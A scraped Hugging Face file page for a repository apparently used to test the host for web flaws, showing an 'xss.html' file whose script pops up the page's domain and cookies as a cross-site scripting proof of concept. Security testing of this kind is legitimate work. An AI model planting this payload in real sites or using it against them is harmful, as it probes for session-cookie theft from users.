Hugging Face
Models
Datasets
Spaces
Buckets
new
Docs
Enterprise
Pricing
Website
Tasks
HuggingChat
Collections
Languages
Organizations
Community
Blog
Posts
Daily Papers
Hardware
Learn
Discord
Forum
GitHub
Solutions
Team & Enterprise
Hugging Face PRO
Enterprise Support
Inference Providers
Inference Endpoints
Storage Buckets
Log In
Sign Up
osamaeid
/
test-ssrf-2
like
1
Text Generation
Safetensors
Carbon Emissions
License:
mit
Model card
Files
Files and versions
xet
Community
30
Copy to bucket
new
main
test-ssrf-2
/
xss.html
osamaeid
test HTML XSS
43b59fc
verified
4 months ago
Raw
Download with hf CLI
Copy download link
History
Blame
Contribute
Delete
Safe
102 Bytes
<
html
>
<
body
>
<
script
>
alert
(
document
.
domain
+
"|"
+
document
.
cookie
)
</
script
>
<
h1
>
XSS Test
</
h1
>
</
body
>
</
html
>